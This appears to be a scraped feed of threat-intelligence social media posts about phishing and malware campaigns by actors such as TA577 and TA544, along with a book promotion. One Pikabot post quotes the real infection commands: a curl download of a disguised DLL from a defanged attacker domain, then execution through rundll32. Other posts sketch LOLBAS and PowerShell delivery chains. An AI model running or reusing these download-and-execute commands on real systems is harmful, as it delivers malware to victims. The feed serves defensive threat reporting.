New blog out on #TA547 and #Rhadamanthys out. This isn't really a deep dive, but it's important to get blogs out in shorter time to the community too, in addition to the deep dives.
The actor has continued with almost daily similar campaigns since March 26th.

Welcome back to the end of another week here at ET! As we research, write, test, curate, & release our rules we want to call out those researchers & entities that've been kind enough to share their great work & #threatintel that have helped us so much.

Man #TA577 going from the somewhat smart NTLM Hash theft to directly attaching ISOs that simply can't be opened with Outlook or any other modern email client...

#Pikabot - .iso > .exe > .dll > .curl > .dll

T1574 - DLL Search Order Hijacking

Open_Document.exe - 'Microsoft Write'

cmd /c md c:\wnd

curl -o c:\wnd\3291.png --url https://yourunitedlaws.]com/mrD/4462

rundll32 c:\wnd\3291.png,GetModuleProp

IOC's
github.com/pr0xylife/Pika…

Me, Selena and Kelsey and the rest of the Threat Insight team released a short writeup of the #TA577 NTLM hash theft campaign from last week.
proofpoint.com/us/blog/threat…

🚨 On February 26th and 27th Telekom Security and Bayern-CERT observed threat actor #TA577 phishing campaigns. This time the actor is not spreading malware, but apparently uses NTLMv2 handshakes to steal user credentials/hashes. 🧵1/7

You might know us because we analyse millions of suspicious URLs every day and generate detections for more than a thousand major online brands. But did you know that we also track millions of newly created hostnames and domains as part of our urlscan Pro platform?

#DanaBot back in email threat data? You botcha. On 14 Feb, TA544 targeted Italian organizations using Agenzia delle Entrate lures to distribute Google Firebase PageLink URLs.

A story in four parts:
proofpoint.com/us/blog/threat…

Some #TA576 stuff I worked with last week.
Benign Message > Reply > Actor Reply wi. web,app URL > Redir> ZIP > LNK > SyncAppvPublishingServer.vbs LOLBAS > PowerShell > MSHTA from URL > Encrypted PowerShell > Obfusc. PowerShell > Download and Run EXE > Heaven's Gate > Parallax RAT

Hey infosec fam, hope you're all doing well! 😎Just a heads up - Barnes&Noble is offering 25% off on pre-orders for my book 'Evasive Malware'. If you ❤️ malware, check it out! No pressure, just wanted to share with you all. Promo code is: PREORDER25.

barnesandnoble.com/w/evasive-malw…

Something I have spent a lot time on this and last week. What's interesting about this chain is the unique combination of different LOLBAS in every single VHD, creating a unique execution flow for every VHD that the actor is using. Read more in the thread 👇

We recently identified a campaign with emails from various senders that included subjects such as “RFQ”. They contained a OneDrive URL that triggered the download of a VHD when clicked. The campaign began on 1/17 and continued through 1/18 to include over 1,300 messages.

We just published details on a new activity cluster we are temporarily calling #BattleRoyal . ow.ly/44NH50Ql69A

It started distributing #DarkGate using distinct GroupIDs from Sept - Nov, then switched to #NetSupport . Delivery methods include email and fake update lures.

Since this report still is cited today in articles regarding the return of #Qbot I would again like to point out that I still believe that the Cisco Talos attribution is wrong.

FWIW this has nothing to do with any qbot actors. Attribution would be easy if several different unrelated actors didn't use the same tooling.
Mine and Selena's writeup on this Knight Lite Ransomware campaign (that came in via HTML attachments):
proofpoint.com/us/blog/email-…

We saw new #Qbot #Qakbot 'tchk07' from PDF > URLs today. MSI > AdobeAC.dll w/ export EditOwnerInfo.
This is still very low volume and targeted.
Huge shout out to our fantastic Myrtus for the RE and config extraction. IOCs in original thread.
Samples:
bazaar.abuse.ch/browse/tag/tch…

Can confirm that we have seen the recent #Qbot #Quakbot #Qakbot activity. PDFs/URLs has been used since at least November 28, but can't confirm what payload it was earlier than December 11.
URL example: urlhaus.abuse.ch/url/2741437/
MSI/DLL: bazaar.abuse.ch/browse/tag/teo…

Nothing to see here, just JAMESWT casually chatting with #TA544 via #Remcos infection on ANY.RUN 😅